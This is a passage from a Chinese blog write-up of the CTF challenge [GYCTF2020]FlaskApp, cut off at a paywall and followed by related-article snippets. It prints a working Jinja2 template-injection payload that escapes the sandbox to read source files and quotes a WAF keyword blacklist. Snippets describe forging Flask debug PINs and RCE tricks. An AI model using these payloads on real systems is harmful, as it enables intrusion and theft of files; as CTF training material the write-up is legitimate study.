一天一道ctf 第38天（报错模板注入 python沙盒逃逸 pin码生成）

最新推荐文章于 2024-09-10 10:36:57 发布

原创

最新推荐文章于 2024-09-10 10:36:57 发布 · 846 阅读

3 ·

CC 4.0 BY-SA版权

[GYCTF2020]FlaskApp
先得到{ {7*7}}的base64加密字符串，然后解密，输出no no no，看样子是被过滤了，这里可能有SSTI模板注入，主要是看怎么绕过过滤
在这里插入图片描述

随便输入字符串让base64解密报错得到文件位置/usr/local/lib/python3.7/site-packages/flask/app.py
![在这里插入图片描述](https://img-blog.csdnimg.cn/20210720115212441.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NjcmF3bWFu,size_16,color_FFFF

{
   
   % for c in [].__class__.__base__.__subclasses__() %}{
   
   % if c.__name__=='catch_warnings' %}{
   
   {
   
    c.__init__.__globals__['__builtins__'].open('app.py','r').read() }}{
   
   % endif %}{
   
   % endfor %}

还是把这串命令加密一下然后解密，得到源码
在这里插入图片描述
可以在里面找到waf，过滤了很多字符。也可以找到执行我们输入的base64字符串的代码，通过GET方法将输入的字符串保存在txt中，如果解密后绕过了waf，则执行flash().

 def waf(str): 
 black_list = ["flag","os&#34;,&#34;system&#34;,&#34;popen&#34;,&#34;import&#34;,&#34;eval&#34;,&#34;chr&#34;,&#34;request&#34;, &#34;subprocess&#34;,&#34;commands&#34;,&#34;socket&#34;,&#34;hex&#34;,&#34;base64&#34;,&#34;*&#34;,&#34;?&#34;] 
 for x in black_list : 
     if x in str.lower() : return 1

@app.route('/decode';,methods=['POST','GET']) 
def decode(): 
    if request.values.get('text')

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

scrawman

关注关注

2
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

buuctf_练[GYCTF2020]FlaskApp

m0_66225311的博客

10-26

903

`ssti`的`python debug`的`PIN`码计算，调用`debug`命令行执行命令。存在`ssti`注入就能进行命令执行，使用拼接操作绕过关键字过滤`['o'+'s']`。不同版本的`python`计算pin码的代码不同。`python`的模板注入可以通过for循环遍历子类特征名的方式，来寻找能够执行命令的子类模块

CTF-Hub SQL 报错注入（纯手动注入）

m0_46745664的博客

11-26

1065

当输入1时，发现只有查询正确，基本上可以判断出没有回显。

参与评论您还未登录，请先登录后发表或查看评论

CTF-实验吧-Forms

kongcz的专栏

08-14

374

题目：似乎有人觉得PIN码是不可破解的，让我们证明他是错的。格式：ctf{} 解题链接：http://ctf5.shiyanbar.com/10/main.php 解题思路：拿到题目首先查看源码，发现有一个input标签，类型为hidden，值为0。感觉这个可能是一个突破口，使用chrome的审查元素把value改为1，然后pin输入框随便输入一个值点击提交。然后f...

[GYCTF2020]FlaskApp

Yb_140的博客

10-31

582

flask开启了debug模式+SSTI

关于ctf中flask算pin总结

arcuied

02-20

6988

flask pin的相关问题

Flask debug 模式生成pin码 + [GYCTF2020]FlaskApp

ShenZ的博客

09-07

3489

ssti的payload还是不太会写… Flask debug 模式生成pin码计算pin所需要的值为： 1.flask所登录的用户名 2.modname 3.getattr(app, “name”, app.class.name) 4.flask库下app.py的绝对路径 5.当前网络的mac地址的十进制数 6.docker机器id 1.flask所登录的用户名 /etc/passwd 中找到用户名 {% for c in [].__class__.__base__.__subclasses__()

CTFHub - 报错注入

Have_a_great_day的博客

09-09

1365

欢迎各位师傅以kill -9 的威力对文章进行检查，Zeus会认真分析听取各位师傅的留言。

CTFHUB-SQL注入-报错注入

weixin_68416970的博客

06-10

693

报错注入是一种SQL注入技术的变种，攻击者通过故意制造数据库错误来获取敏感信息。这种方法通常用于那些不允许正常错误信息回显的应用程序，攻击者利用数据库的错误处理机制，将希望得到的信息嵌入到可能导致错误的SQL语句中，从而使错误信息透露出所需的数据。

SSTI 服务端模板注入 / 沙盒逃逸

Kaleido76的博客

02-16

664

这个部分之前一直只会生搬硬套，其实到底是什么回事都不太清楚，这次查了很多资料，把这部分内容的思路整理一下。

pin-in-CTF:使用intel pin来求解一部分CTF challenge

05-09

pin-in-CTF 使用intel pin来求解一部分CTF challenges

ssti python 沙箱jinja2利用，PIN获取之[GYCTF2020]FlaskApp

qq_58970968的博客

08-20

558

对于非docker机每一个机器都会有自已唯一的id，linux的id一般存放在/etc/machine-id或/proc/sys/kernel/random/boot_i，有的系统没有这两个文件。对于docker机则读取/proc/self/cgroup，其中第一行的/docker/字符串后面的内容作为机器的id，首先判断是什么类型的ssti，再利用，这里通过报错抛出debug信息的内容判断：爆出的报错部分的代码里面的特殊函数；得到的Mac地址：print(int('去掉“：”后的地址',16))

CTF-RE dont_panic （pin二进制打桩暴力）

SuperGate的博客

07-13

1407

部分参考题解：http://eternal.red/2017/dont_panic-writeup/ 方便起见，题目文件名改成go 运行题目程序，发现flag是跟在命令行参数之后的。用IDA打开后发现没有找到main函数，因此选择在Linux下查看段信息： supergate@ubuntu:~/Desktop/task1$ readelf -S go 得到信息如下： Section ...

flask计算pin码

weixin_63231007的博客

07-13

4817

python flask-pin码介绍 & CTF中 flask-pin码计算的应用

BUUCTF 34

qq_52431855的博客

03-02

219

知识点 os.listdir() 方法用于返回指定的文件夹包含的文件或文件夹的名字的列表。什么是phar反序列化：传送门 34-1[GYCTF2020]FlaskApp 做题思路打开题目发现一个base64加密解密的界面其中还有一个提示，点开提示写到据WP得知应该由此能想到Flask的debug模式。。 base64decode在不会解析的时候就会报错，然后习惯性对base64解密页面进行报错实验，base64解密界面随意输入字符串，导致解码报错，进入Debug页面，发现了部分..

CTF - Python 沙箱绕过与任意命令执行技巧

四楼没电梯的专栏

09-10

1990

您可以修改某些类方法（通过覆盖现有类方法或创建新类），以使它们在被触发时执行任意代码，而无需直接调用它们。# 这个类有 3 种不同的方式在不直接调用任何函数的情况下触发 RCEclass RCE:__iadd__ = exec # 在对象创建时触发__isub__ = exec # 在对象创建时触发__getitem__ = exec # 用 obj[]触发__add__ = exec # 用 obj + 触发# 这些行直接滥用前面的类来获得 RCE。

flask的pin码攻击——新版本下pin码的生成方式

qq_42303523的博客

04-17

5060

在打*CTF的时候，一道明显是flask的pin码生成进而RCE的题目卡了半天，最后发现是新版本的flask的pin码生成方式有了一定的改变，这里做一下记录。我们常用的生成pin码的脚本如下： import hashlib from itertools import chain probably_public_bits = [ 'root',# username 'flask.app',# modname 'Flask',# getattr(app, '__name__', get

CTF刷题

m_de_g的博客

06-01

513

BugKu——SSTI 1、判断是否存在ssti漏洞 2*8=16 说明存在ssti漏洞 List item 2、开始模板注入知道’’的类型是字符型。 3、接下来我们找其父类找到父类，父类是’object’ 4、因为只有一个’父类’，需要加一个下标， 5、找父类下的所有子类 {{’’.class.bases[0].subclasses()}} 6、接下来使用脚本，跑出那个子类中含有os模块运行find_func.py脚本输入字符串的地方，把所有的子类将其放入到其中，然后模块的话，直接

[*CTF2022]oh_my_lotto_revenge

Huamang的博客

04-21

3031

New 相对于oh_my_lotto，revenge进行了下面的更改这么做，我们能走的就只有RCE了，而这里唯一能操作的一个地方就是这里，可以操作环境变量 os.environ[lotto_key] = lotto_value 这里有几个非预期解，先看看预期解 Intented writeup 这里可以操控环境变量，那么我们能做的事情就很多了，预期解是操控HOSTALIASES修改hosts 因为他的wget是通过域名下载的 os.system('wget --content-disposition

CTF命令执行绕过总结

gou1791241251的博客

08-04

931

命令执行绕过命令总结

一道CTFweb题，我用Python构造了cookie报错注入的gopher请求，然后就差一步获得flag，怎么办

最新发布

11-13

由于提供的引用内容未涉及使用Python构造cookie报错注入的gopher请求后无法获得CTF web题中flag的解决办法相关信息，结合专业知识，以下是一些可能的解决思路： ### 检查请求构造 - **请求格式**：确保gopher请求的格式正确，包括协议、主机、端口、路径、请求方法等信息。例如，HTTP请求的起始行、头部字段和请求体的格式要符合规范。 ```python import socket # 构造gopher请求 gopher_request = "GET /path HTTP/1.1\r\n" gopher_request += "Host: example.com\r\n" gopher_request += "Cookie: injection_payload\r\n" gopher_request += "\r\n" # 连接到目标服务器 sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect(("example.com", 80)) # 发送请求 sock.sendall(gopher_request.encode()) # 接收响应 response = sock.recv(4096) print(response.decode()) sock.close() ``` - **编码问题**：确认请求中的特殊字符是否正确编码，如URL编码、Base64编码等。错误的编码可能导致服务器无法正确解析请求。 ### 检查注入点和注入语句 - **注入点准确性**：确保选择的cookie注入点正确。可以通过分析网页源代码、使用浏览器开发者工具等方式来确定注入点。 - **注入语句有效性**：检查构造的报错注入语句是否有效。不同的数据库和应用程序可能对注入语句有不同的要求，需要根据具体情况进行调整。 ### 检查服务器响应 - **响应处理**：确保正确处理服务器的响应。有些情况下，flag可能不会直接显示在响应中，而是通过特定的方式返回，如HTTP头部、JSON数据等。 ```python import requests # 发送gopher请求 response = requests.get("gopher://example.com:80/...") # 检查响应状态码 if response.status_code == 200: # 处理响应内容 if "flag" in response.text: print("Flag found:", response.text) else: print("Flag not found in response.") else: print("Request failed with status code:", response.status_code) ``` - **错误信息分析**：查看服务器返回的错误信息，从中获取有用的线索。错误信息可能提示注入语句存在的问题、数据库类型等。 ### 检查网络和权限问题 - **网络连接**：确保网络连接正常，目标服务器可以访问。可以尝试使用ping命令、telnet命令等工具进行测试。 - **权限限制**：确认是否存在权限限制，如防火墙、访问控制列表等。有些服务器可能会对特定的请求进行过滤或阻止。